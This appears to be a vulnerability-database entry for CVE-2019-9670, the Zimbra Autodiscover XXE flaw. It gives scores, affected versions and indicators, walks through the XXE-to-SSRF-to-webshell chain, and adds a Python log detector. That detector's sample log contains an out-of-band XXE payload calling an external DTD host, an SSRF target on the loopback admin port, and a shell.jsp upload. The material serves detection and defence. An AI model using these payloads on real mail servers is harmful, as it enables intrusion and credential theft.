cbcvebase.
CVE-2019-9670
published 2019-05-29


Priority: P1 · 93
Severity: critical · 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability · due 2022-07-10
Exploited in the wild
EPSS: 99.99% (100.0th percentile)
mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability, as demonstrated by Autodiscover/Autodiscover.xml.

Affected (2 ranges)

Vendor    Product                      Version range        Fixed in
synacor   zimbra_collaboration_suite   -                    -
synacor   zimbra_collaboration_suite   >= 8.7.0 < 8.7.11    8.7.11

Note that the CPE range stops at 8.7.11, but the fixed release named in the description is 8.7.11 Patch 10 (8.7.11p10): an 8.7.11 installation without that patch is still vulnerable, so check the patch level, not just the version.

Detection & IOCs (extracted from sources)

url     /autodiscover
url     /service/soap/
url     /service/proxy/
url     /service/extension/clientUploader/upload
url     https://127.0.0.1:7071/service/admin/soap/AuthRequest
cookie  ZM_ADMIN_AUTH_TOKEN
port    8443
port    7071
snort   Snort SID 49898
  • The XXE stage is an HTTP POST to the Autodiscover servlet at /Autodiscover/Autodiscover.xml (abbreviated /autodiscover in the IOC list). Alert on POSTs to that path on Zimbra hosts whose XML body carries a DOCTYPE or ENTITY declaration with a SYSTEM or PUBLIC external identifier; a legitimate Autodiscover request has neither.
  • With the LDAP credentials recovered through the XXE, the exploit chains into SSRF via /service/proxy/ with a target query parameter pointing at the internal admin port 7071 (e.g. /service/proxy/?target=https://127.0.0.1:7071/service/admin/soap/) to issue an admin AuthRequest. A target value that resolves to loopback or to port 7071 is a strong indicator of exploitation.
  • Post-exploitation, a JSP webshell is uploaded by POSTing multipart form-data to /service/extension/clientUploader/upload, authorized with the ZM_ADMIN_AUTH_TOKEN cookie obtained from that AuthRequest. Monitor for uploads to this endpoint, particularly .jsp or .jspx filenames, and for the admin token cookie being presented on the user-facing port.
  • Zimbra serves these endpoints over TLS (8443 for users, 7071 for admin), so enable SSL decryption in Cisco Secure Firewall and Snort; without decryption, Snort SID 49898 only sees ciphertext and cannot match the payload.
  • CVE-2019-9670 is combined with CVE-2019-9621 (SSRF) in the Metasploit module for full unauthenticated RCE. Detections should cover both stages, since either one on its own is already suspicious.
  • APT29/SVR has been observed exploiting CVE-2019-9670 in Zimbra as an initial access vector. Treat any successful exploitation as a high-priority incident given nation-state interest.
  • The Metasploit module defaults to SSL=true and RPORT=8443. Ensure network monitoring covers HTTPS on 8443 (and 7071 for internal admin); plain-HTTP inspection will miss these requests.
  • The module flips datastore['SSL'] to false around the XXE stage and restores it afterwards. Because Metasploit's HTTP client and HTTP server mixins share that option, the toggle governs the module's own DTD listener (served over plain HTTP), not the POST to the target, which would fail against a TLS-only 8443. The observable is therefore an outbound cleartext HTTP fetch of a .dtd by the Zimbra host, not a cleartext POST to /autodiscover.
  • The exploit uses an out-of-band DTD callback to an attacker-controlled HTTP server to exfiltrate the Zimbra LDAP password (read from localconfig.xml) via XXE. A mailbox server has no reason to fetch DTDs from the internet: egress filtering and monitoring of unexpected outbound HTTP and DNS from the Zimbra server are critical detection controls.
  • Affected versions are Zimbra Collaboration Suite 8.5 through 8.7.11 (the fix is 8.7.11 Patch 10). Snort SID 49898 coverage applies; verify the rule is active and TLS inspection is enabled for full coverage.
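As an added example (not code from this page, from Zimbra, or from the Metasploit module), the following Python applies the three stage indicators above to a request log and correlates hits per source address. It assumes a reverse proxy in front of mailboxd that logs each request as one JSON object with ts, src, method, uri and a body excerpt; the sample log lines are constructed for illustration, using RFC 5737 documentation addresses, not captured traffic.

```python
"""Stage detection for the CVE-2019-9670 -> CVE-2019-9621 -> webshell chain.

Added example, not code from the page, Zimbra or Metasploit. Assumes a reverse
proxy that logs one JSON object per request (ts, src, method, uri, body
excerpt). SAMPLE_LOG below is constructed, not real traffic.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Endpoints from the IOC list.
AUTODISCOVER_RE = re.compile(r"^/autodiscover(/autodiscover\.xml)?/?$", re.I)
PROXY_PATH = "/service/proxy/"
UPLOAD_PATH = "/service/extension/clientUploader/upload"
ADMIN_PORT = 7071
LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# DOCTYPE/ENTITY with an external identifier: required for out-of-band XXE,
# never present in a legitimate Autodiscover request.
XXE_MARKER_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b[^>]*\b(?:SYSTEM|PUBLIC)\b", re.I)
JSP_UPLOAD_RE = re.compile(r'filename="[^"]*\.jspx?"', re.I)


def classify(rec):
    """Return the chain stage one request matches ('xxe', 'ssrf', 'upload') or None."""
    method = rec.get("method", "").upper()
    url = urlsplit(rec.get("uri", ""))
    body = rec.get("body", "")
    if method == "POST" and AUTODISCOVER_RE.match(url.path) and XXE_MARKER_RE.search(body):
        return "xxe"
    if url.path == PROXY_PATH:
        for target in parse_qs(url.query).get("target", []):
            t = urlsplit(target)
            try:
                port = t.port
            except ValueError:  # malformed port in the target URL
                port = None
            if t.hostname in LOOPBACK or port == ADMIN_PORT:
                return "ssrf"
    if method == "POST" and url.path == UPLOAD_PATH and JSP_UPLOAD_RE.search(body):
        return "upload"
    return None


def parse_log(text):
    """Parse JSON-lines request records, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            records.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return records


def correlate(records, window=timedelta(minutes=30)):
    """Group stage hits by source and rate them.

    A single stage is already 'high'; two or more distinct stages from the same
    source inside `window` is the chained exploit and is rated 'critical'.
    """
    hits = defaultdict(list)
    for rec in records:
        stage = classify(rec)
        if stage:
            hits[rec["src"]].append((datetime.fromisoformat(rec["ts"]), stage))
    alerts = []
    for src, events in sorted(hits.items()):
        events.sort()
        stages = [s for _, s in events]
        span = events[-1][0] - events[0][0]
        chained = len(set(stages)) >= 2 and span <= window
        alerts.append({"src": src, "stages": stages, "severity": "critical" if chained else "high"})
    return alerts


# Constructed sample log: one attacker running the full chain, two benign clients.
SAMPLE_LOG = r"""
{"ts": "2019-06-01T10:00:01", "src": "203.0.113.5", "method": "POST", "uri": "/Autodiscover/Autodiscover.xml", "body": "<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM \"http://198.51.100.7:8080/xxe.dtd\">%dtd;]><Autodiscover><Request><EMailAddress>x</EMailAddress></Request></Autodiscover>"}
{"ts": "2019-06-01T10:00:09", "src": "203.0.113.5", "method": "POST", "uri": "/service/proxy/?target=https://127.0.0.1:7071/service/admin/soap/", "body": "<soap:Envelope>...<AuthRequest xmlns=\"urn:zimbraAdmin\">...</soap:Envelope>"}
{"ts": "2019-06-01T10:00:15", "src": "203.0.113.5", "method": "POST", "uri": "/service/extension/clientUploader/upload", "body": "--boundary\r\nContent-Disposition: form-data; name=\"clientFile\"; filename=\"shell.jsp\"\r\n\r\n..."}
{"ts": "2019-06-01T10:01:00", "src": "198.51.100.20", "method": "POST", "uri": "/Autodiscover/Autodiscover.xml", "body": "<?xml version=\"1.0\"?><Autodiscover><Request><EMailAddress>user@example.org</EMailAddress></Request></Autodiscover>"}
{"ts": "2019-06-01T10:02:00", "src": "198.51.100.21", "method": "GET", "uri": "/service/proxy/?target=https://mail.example.org/zimbra/", "body": ""}
"""

if __name__ == "__main__":
    for alert in correlate(parse_log(SAMPLE_LOG)):
        print(alert)
```

The body check is what separates the attack from ordinary Autodiscover traffic, so this logic belongs where request bodies are visible after TLS termination. The target check matches on the literal hostname; in production also compare the proxy's resolved destination, since a DNS name that resolves to loopback would slip past a hostname-only match.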

CVSS provenance

nvd        v3.1   9.8   CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0   7.5   HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck         9.8   CRITICAL
cisa              9.8   CRITICAL